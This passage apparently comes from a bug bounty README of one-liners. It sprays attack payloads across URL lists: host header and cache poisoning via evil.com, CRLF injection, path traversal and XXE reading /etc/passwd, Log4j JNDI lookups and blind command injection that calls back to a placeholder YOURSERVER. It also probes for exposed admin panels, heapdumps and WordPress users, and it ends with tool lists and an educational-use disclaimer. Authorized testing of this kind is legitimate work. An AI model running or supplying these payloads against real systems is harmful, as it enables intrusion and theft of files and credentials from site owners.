Host Header Injection

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"

CRLF Injection

cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"

Prototype Pollution

cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txt

Cache Poisoning Detection

cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200

IDOR Pattern Detection

cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt

Race Condition URLs

cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt

WebSocket Endpoints

cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt

Path Traversal

cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"

XXE Detection

cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'

Log4j Scan

cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'

Blind Command Injection

cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent
cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent

Mass Screenshot

cat alive.txt | xargs -I@ gowitness single @ -o screenshots/

Technology Detection

cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt

Favicon Hash (Shodan)

curl -s https://target.com/favicon.ico | md5sum | awk '{print $1}'

Exposed Admin Panels

cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt

Debug Endpoints

cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt

Spring Boot Actuators

cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt

WordPress Enumeration

cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt

Laravel Debug Mode

cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt

Django Debug

cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt

HTTP Request Smuggling

cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt

CSP Bypass Check

cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt

Subdomain from Favicon (Shodan mmh3 hash for the http.favicon.hash filter)

curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"

🔍 Search Engines for Hackers

| Engine | Link | Description |
|---|---|---|
| Shodan | shodan.io | IoT & device search |
| Censys | censys.io | Internet scan data |
| Fofa | fofa.info | Cyberspace search |
| ZoomEye | zoomeye.org | Cyberspace mapping |
| Hunter | hunter.how | Asset discovery |
| Netlas | netlas.io | Attack surface |
| GreyNoise | greynoise.io | Internet scanners |
| Onyphe | onyphe.io | Cyber defense |
| CriminalIP | criminalip.io | Threat intel |
| FullHunt | fullhunt.io | Attack surface |
| Quake | quake.360.net | Cyberspace search |
| Leakix | leakix.net | Leak detection |
| URLScan | urlscan.io | URL analysis |
| DNSDumpster | dnsdumpster.com | DNS recon |
| crt.sh | crt.sh | Certificate search |
| SecurityTrails | securitytrails.com | DNS history |
| Pulsedive | pulsedive.com | Threat intel |
| VirusTotal | virustotal.com | File/URL analysis |
| PublicWWW | publicwww.com | Source code search |
| Grep.app | grep.app | GitHub code search |

📖 Recommended Wordlists

| Wordlist | Link | Use Case |
|---|---|---|
| SecLists | GitHub | Everything |
| FuzzDB | GitHub | Fuzzing |
| Assetnote | wordlists.assetnote.io | Web content |
| OneListForAll | GitHub | Combined |
| jhaddix all.txt | GitHub | Directories |
| commonspeak2 | GitHub | Real-world |

📚 Learning Resources

Books

  • Web Application Hacker's Handbook
  • Real-World Bug Hunting by Peter Yaworski
  • Bug Bounty Bootcamp by Vickie Li



🤝 Contributing

We welcome contributions from the community! Your expertise makes this repository better.

💡 How to Contribute

  1. Fork the Repository

    git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git
    cd KingOfBugBountyTips
    
  2. Create a New Branch

    git checkout -b feature/your-contribution
    
  3. Add Your Content

    • Add new one-liners with proper documentation
    • Include source references and explanations
    • Follow the existing format and structure
  4. Submit Pull Request

    • Write a clear description of your changes
    • Reference any related issues
    • Wait for review and feedback

✨ What to Contribute

  • 🎯 New bug bounty one-liners and techniques
  • 🔧 Tool installation guides and tips
  • 📚 Additional resources and references
  • 🐛 Bug fixes and improvements
  • 📖 Documentation enhancements
  • 🌐 Translations to other languages


💖 Support the Project

If this repository helped you in your bug bounty journey, consider supporting the project!

Buy Me A Coffee

⭐ Show Your Support

Give this repository a star if you found it helpful!


📜 License & Legal

⚠️ Important Disclaimer

╔═══════════════════════════════════════════════════════════════╗
║                    ⚠️  LEGAL NOTICE ⚠️                        ║
╠═══════════════════════════════════════════════════════════════╣
║  This repository is for EDUCATIONAL PURPOSES ONLY             ║
║                                                                ║
║  ✅ DO: Use for authorized security testing                   ║
║  ✅ DO: Learn and understand the techniques                   ║
║  ✅ DO: Contribute and share knowledge                        ║
║                                                                ║
║  ❌ DON'T: Use for unauthorized testing                       ║
║  ❌ DON'T: Use for malicious purposes                         ║
║  ❌ DON'T: Violate laws or regulations                        ║
║                                                                ║
║  The authors are NOT responsible for any misuse or damage     ║
║  caused by this information. Always test responsibly!         ║
╚═══════════════════════════════════════════════════════════════╝

🔗 Quick Links & Resources

| Resource | Link |
|---|---|
| 🏠 Homepage | King of Bug Bounty Tips |
| 🛠️ KingRecon DOD | Automated Recon Tool |
| 🐧 BugBuntu OS | Download Here |
| 📺 YouTube Channel | OFJAAAH |
| 💬 Telegram Group | Join Community |
| 🐦 Twitter/X | @ofjaaah |
| 💼 LinkedIn | Connect |
| 🐛 Report Issues | GitHub Issues |
| 🔐 Security Issues | Security Advisory |

🌟 Special Thanks

To all contributors, bug bounty hunters, and the security community who make this project possible!


Last Updated: January 2026 | Version: 4.5



╔══════════════════════════════════════════════════════════════════╗
║          "Stay curious, stay ethical, stay hungry" 🏴‍☠️          ║
║                  Happy Hunting! 💀                               ║
╚══════════════════════════════════════════════════════════════════╝

Made with ❤️ by the Bug Bounty Community